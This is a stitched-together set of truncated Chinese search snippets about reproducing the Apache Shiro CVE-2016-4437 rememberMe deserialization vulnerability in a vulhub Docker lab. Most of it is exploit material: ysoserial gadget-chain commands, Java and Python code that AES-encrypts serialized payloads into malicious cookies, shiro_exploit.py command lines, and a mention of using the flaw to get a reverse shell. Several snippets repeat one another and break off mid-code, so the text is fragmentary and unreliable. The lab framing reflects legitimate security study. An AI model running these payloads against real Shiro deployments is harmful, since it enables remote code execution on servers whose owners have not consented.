漏洞利用# 构造poc 我们只需要反着来 生成序列化后的 poc aes 加密 base64 加密 URLDNS# 序列化 poc 如下: importjava.io.*;importjava.lang.reflect.Field;importjava.net.URL;importjava.util.HashMap;publicclassURLDNSEXP{publicstaticvoidmain(String[]args)throwsException{HashMap<URL,Integer>hashmap=newHa...
继续复现shiro的漏洞,这次选择靶机cve-2016-4437。这个漏洞可以说我经常给看见登录就想来一波校验,毕竟可以反弹shell过来的招数交货收工,节省时间。 同样: docker-compose up -d 发现时区不对.更新一下时区: 由于我是kali,所以使用以下命令: apt-get install -yntpdatentpdate cn.pool.ntp.org 再次docker-compose...
1、进入vulhub-master/shiro/CVE-2016-4437目录下 2、docker环境启动 highlighter- docker-compose up -d 3、浏览器访问http://192.168.2.147:8080 4、使用Shiro_exploit的poc进行漏洞利用 highlighter- Go python3 shiro_exploit.py -t3-u http://192.168.2.147:8080 -p "touch a.txt" 5、成功在服务器创建a...
CVE-2016-4437(Apache shiro) 00x1 漏洞简介 前言 Apache Shiro是一个功能强大且易于使用的Java安全框架,用于进行身份验证、授权、加密和会话管理等安全操作。 2016年网络中曝光 Apache Shiro 1.2.4 以前的版本存在反序列化漏洞,尽管该漏洞已经曝光几年,但是在实战中仍然比较实用。
1、 服务端接收rememberMe的cookie值后的操作是:Cookie中rememberMe字段内容 —> Base64解密 —> 使用密钥进行AES解密 —>反序列化,我们要构造 poc 就需要先序列化数据然后再AES加密最后base64编码。 2、由于上述 shirodemo 存在 commons-collections 3.2.1 依赖, 所以可使用 CommonsCollections5 利用链, 借助 ysos...
java -jar ysoserial.jar CommonsBeanutils1"touch /tmp/success"> poc.ser AI代码助手复制代码 将字节码文件拷贝到项目中 2 编写代码进行AES加密 importorg.apache.shiro.codec.Base64;importorg.apache.shiro.codec.CodecSupport;importorg.apache.shiro.crypto.AesCipherService;importorg.apache.shiro.util.ByteSource...
5、使用python编写的poc生成恶意cookie。 import sys import uuid import base64 import subprocess from Crypto.Cipher import AES def encode_rememberme(command): popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE) BS = ...
使用python编写的poc生成恶意cookie import sys import uuid import base64 import subprocess from Crypto.Cipher import AES def encode_rememberme(command): popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda...
1、进⼊vulhub-master/shiro/CVE-2016-4437⽬录下 2、docker环境启动 docker-compose up -d 3、浏览器访问http://192.168.2.147:8080 4、使⽤Shiro_exploit的poc进⾏漏洞利⽤ python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"5、成功在服务器创建a.txt⽂...
POC import sys import uuid import base64 import subprocess from Crypto.Cipher import AES def encode_rememberme(command): popen = subprocess.Popen([‘java‘, ‘-jar‘, ‘ysoserial-0.0.6-SNAPSHOT-all.jar‘, ‘JRMPClient‘, command], stdout=subprocess.PIPE) ...